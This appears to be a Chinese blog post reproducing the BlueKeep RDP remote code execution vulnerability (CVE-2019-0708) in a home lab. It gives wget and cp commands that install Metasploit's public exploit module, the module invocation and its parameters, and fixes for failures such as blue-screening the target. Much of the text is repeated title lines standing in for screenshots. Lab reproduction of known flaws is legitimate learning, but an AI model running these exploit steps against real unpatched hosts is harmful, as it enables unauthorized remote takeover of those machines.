CVE-2019-0708 远程桌面代码执行漏洞复现

CVE-2019-0708 远程桌面代码执行漏洞复现
CVE-2019-0708 远程桌面代码执行漏洞复现
CVE-2019-0708 远程桌面代码执行漏洞复现
CVE-2019-0708 远程桌面代码执行漏洞复现
CVE-2019-0708 远程桌面代码执行漏洞复现

于是就有了这篇文章。


0x02

首先是靶机,这里的靶机是使用清水表哥提供的win7sp1的系统

漏洞环境
使用VM安装Windows7 SP1模拟受害机
Windows7 SP1下载链接:
ed2k://|file|cn_windows_7_ultimate_with_sp1_x64_dvd_u_677408.iso|3420557312|B58548681854236C7939003B583A8078|/

如果用上面的系统,vm虚拟机安装的时候默认是家庭版的,所以在安装的时候要选择一下。

CVE-2019-0708 远程桌面代码执行漏洞复现

安装好如下:

CVE-2019-0708 远程桌面代码执行漏洞复现

0708漏洞利用方式是通过远程桌面端口3389,RDP协议进行攻击的。所以3389端口当然要打开啦。

CVE-2019-0708 远程桌面代码执行漏洞复现

靶机工作完成。


0x03

攻击机我这里用的是kali里面的msf,而且msf我以前有卸载了重新安装过。
所以我先看看我msf安装的路径在哪里。

find / -name 'metasploit'
CVE-2019-0708 远程桌面代码执行漏洞复现

我的路径是安装在/opt目录下。

首先,我们需要下载好攻击套件放置文件到msf的相应文件夹(如果已存在同名文件,直接覆盖即可)

wget https://raw.githubusercontent.com/rapid7/metasploit-framework/edb7e20221e2088497d1f61132db3a56f81b8ce9/lib/msf/core/exploit/rdp.rb

wget https://github.com/rapid7/metasploit-framework/raw/edb7e20221e2088497d1f61132db3a56f81b8ce9/modules/auxiliary/scanner/rdp/rdp_scanner.rb

wget https://github.com/rapid7/metasploit-framework/raw/edb7e20221e2088497d1f61132db3a56f81b8ce9/modules/exploits/windows/rdp/cve_2019_0708_bluekeep_rce.rb

wget https://github.com/rapid7/metasploit-framework/raw/edb7e20221e2088497d1f61132db3a56f81b8ce9/modules/auxiliary/scanner/rdp/cve_2019_0708_bluekeep.rb
CVE-2019-0708 远程桌面代码执行漏洞复现

下载下来后,直接复制到对应的路径。

cp rdp.rb /opt/metasploit-framework/embedded/framework/lib/msf/core/exploit/

cp rdp_scanner.rb /opt/metasploit-framework/embedded/framework/modules/auxiliary/scanner/

如果这里没有rdp目录,就用mkdir命令创建一个rdp目录

cp cve_2019_0708_bluekeep_rce.rb /opt/metasploit-framework/embedded/framework/modules/exploits/rdp/

cp cve_2019_0708_bluekeep.rb /opt/metasploit-framework/embedded/framework/modules/auxiliary/scanner/rdp/
CVE-2019-0708 远程桌面代码执行漏洞复现

这时启动msf。

CVE-2019-0708 远程桌面代码执行漏洞复现

更新一下msf

CVE-2019-0708 远程桌面代码执行漏洞复现

更新以后使用reload_all重新加载0708rdp利用模块

CVE-2019-0708 远程桌面代码执行漏洞复现
use exploit/rdp/cve_2019_0708_bluekeep_rce
CVE-2019-0708 远程桌面代码执行漏洞复现

主要设置的参数有RHOSTS / RPORT / target

  • RHOSTS 靶机ip
  • RPORT rdp端口
  • target ID数字(可选为0-4)设置受害机机器架构

0x4

bingo

CVE-2019-0708 远程桌面代码执行漏洞复现

0x05

你以为过程真的就那么顺风顺水吗?

CVE-2019-0708 远程桌面代码执行漏洞复现
CVE-2019-0708 远程桌面代码执行漏洞复现
CVE-2019-0708 远程桌面代码执行漏洞复现
CVE-2019-0708 远程桌面代码执行漏洞复现
CVE-2019-0708 远程桌面代码执行漏洞复现
CVE-2019-0708 远程桌面代码执行漏洞复现
CVE-2019-0708 远程桌面代码执行漏洞复现
CVE-2019-0708 远程桌面代码执行漏洞复现
CVE-2019-0708 远程桌面代码执行漏洞复现
CVE-2019-0708 远程桌面代码执行漏洞复现
CVE-2019-0708 远程桌面代码执行漏洞复现

0x06

分析一下大部分问题的原因

CVE-2019-0708 远程桌面代码执行漏洞复现

这种情况是 rdp.rb 和 rdp_scanner.rb 文件没覆盖好。重新执行一下以下命令。 上文有贴此命令。

CVE-2019-0708 远程桌面代码执行漏洞复现
CVE-2019-0708 远程桌面代码执行漏洞复现

这种情况应该是把靶机打蓝屏了。
set forceexploit true 执行命令再运行就没有蓝屏。

CVE-2019-0708 远程桌面代码执行漏洞复现

这种情况是网络都ping不通,或者3389端口没打开。


在确认系统是win7sp1,3389端口开启,能ping的通,且文件覆盖成功,target0-4都试了遍,重启系统多次,要是还是没法成功,把配置设置成2核2g在试试。

相关文章:
CVE-2019-0708远程桌面代码执行漏洞复现

CVE-2019-0708漏洞复现及修复补丁

© 版权声明
THE END
喜欢就支持一下吧
点赞8 分享
评论 抢沙发

请登录后发表评论

    暂无评论内容